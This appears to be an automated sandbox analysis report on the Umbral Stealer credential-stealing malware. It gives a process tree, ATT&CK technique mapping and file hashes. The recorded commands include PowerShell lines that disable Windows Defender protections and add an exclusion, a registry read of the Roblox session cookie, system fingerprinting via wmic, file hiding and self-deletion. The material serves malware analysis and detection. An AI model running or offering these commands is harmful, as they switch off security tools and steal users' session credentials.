PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 4860	5788	msedge.exe	86
PID 5788 wrote to memory of 1692	5788	msedge.exe	87
PID 5788 wrote to memory of 1692	5788	msedge.exe	87
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88
PID 5788 wrote to memory of 5656	5788	msedge.exe	88

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1368	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/Blank-c/Umbral-Stealer/releases/tag/v1.3
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8a8d346f8,0x7ff8a8d34708,0x7ff8a8d34718
  2⤵
  PID:3384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
  2⤵
  PID:4860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2980 /prefetch:8
  2⤵
  PID:5656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:1816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:2024
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
  2⤵
  PID:5364
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
  2⤵
  PID:2980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:1724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:4176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5764 /prefetch:8
  2⤵
  PID:1824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4084 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1
  2⤵
  PID:1212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
  2⤵
  PID:5440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6020 /prefetch:2
  2⤵
  PID:3848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3788 /prefetch:1
  2⤵
  PID:4592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
  2⤵
  PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
  2⤵
  PID:4784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
  2⤵
  PID:2132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1688 /prefetch:1
  2⤵
  PID:2004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:3880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:1
  2⤵
  PID:4296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6704 /prefetch:8
  2⤵
  PID:3168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5808 /prefetch:8
  2⤵
  - Modifies registry class
  PID:5492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
  2⤵
  PID:5932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
  2⤵
  PID:3904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6660 /prefetch:1
  2⤵
  PID:2064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
  2⤵
  PID:2368
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1
  2⤵
  PID:4344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
  2⤵
  PID:3964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5960 /prefetch:8
  2⤵
  PID:5876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1340 /prefetch:1
  2⤵
  PID:5792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7352 /prefetch:1
  2⤵
  PID:3792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
  2⤵
  PID:3880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5756 /prefetch:8
  2⤵
  PID:5048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,6095941074068285756,16174516612760517596,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
  2⤵
  PID:6076

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5944

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5148

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5616

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4444
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Umbral.Stealer\Umbral.builder.exe.config
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:3460

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2228
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Umbral.Stealer\Umbral.builder.pdb
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:5364

C:\Users\Admin\Downloads\Umbral.Stealer\Umbral.builder.exe
"C:\Users\Admin\Downloads\Umbral.Stealer\Umbral.builder.exe"
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5996

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x520 0x50c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380

C:\Users\Admin\Downloads\Umbral.exe
"C:\Users\Admin\Downloads\Umbral.exe"
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1648
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\Umbral.exe"
  2⤵
  - Views/modifies file attributes
  PID:1368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Umbral.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2948
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4872
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1020
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4220
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:1932
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Umbral.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3580
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3336

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Umbral-PVMNUDVD.zip\Browsers\Cookies\Edge Cookies.txt
1⤵
PID:5040

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_Umbral-PVMNUDVD.zip\Messenger\Discord\Discord Accounts.txt
1⤵
PID:4604

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Umbral-PVMNUDVD.zip\Display\Display.png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:6096

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4156

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\0542ec13-5e0c-4f97-a6f8-73870c169e4f.tmp

Filesize
11KB

MD5
2fe840744a886c720a5745cc78b2b8cf

SHA1
2ef4306dbf52b449f914817db91fadcce7e41262

SHA256
f795a1b76b3253db64595c09a34930dbe43531931edfa8a4f1f64c04ec3fcdd4

SHA512
171ca8ed934649e57614e4e2adeafd772e5485266536af1540dc878e842cb9ecfeb7021c10281045625a2363cb3882ed6465cb3eb67c28ebc3d3a6bfd7c1af01

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7114a6cd851f9bf56cf771c37d664a2

SHA1
769c5d04fd83e583f15ab1ef659de8f883ecab8a

SHA256
d2c75c7d68c474d4b8847b4ba6cfd09fe90717f46dd398c86483d825a66e977e

SHA512
33bdae2305ae98e7c0de576de5a6600bd70a425e7b891d745cba9de992036df1b3d1df9572edb0f89f320e50962d06532dae9491985b6b57fd37d5f46f7a2ff8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
719923124ee00fb57378e0ebcbe894f7

SHA1
cc356a7d27b8b27dc33f21bd4990f286ee13a9f9

SHA256
aa22ab845fa08c786bd3366ec39f733d5be80e9ac933ed115ff048ff30090808

SHA512
a207b6646500d0d504cf70ee10f57948e58dab7f214ad2e7c4af0e7ca23ce1d37c8c745873137e6c55bdcf0f527031a66d9cc54805a0eac3678be6dd497a5bbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\40fe3926-292a-4ed8-97dd-8a6df7a6588c.tmp

Filesize
7KB

MD5
2043880e1db26f44be308623401ba933

SHA1
c8c2efa55d78e3ca70ade848c11b4c06dc1c5783

SHA256
cd9bbda964a1a103337543f7d221d979c340cfee35aa0c0ecd2dafa01e2561e8

SHA512
c8cc28ef9772b82b18b3bcb6656e66333203b339b59d96aea168bd32e05ab0d283905fd490dd249a90dd0997e94f483f7e80cb368534803869f0bb41fd4be69c

Download Submit
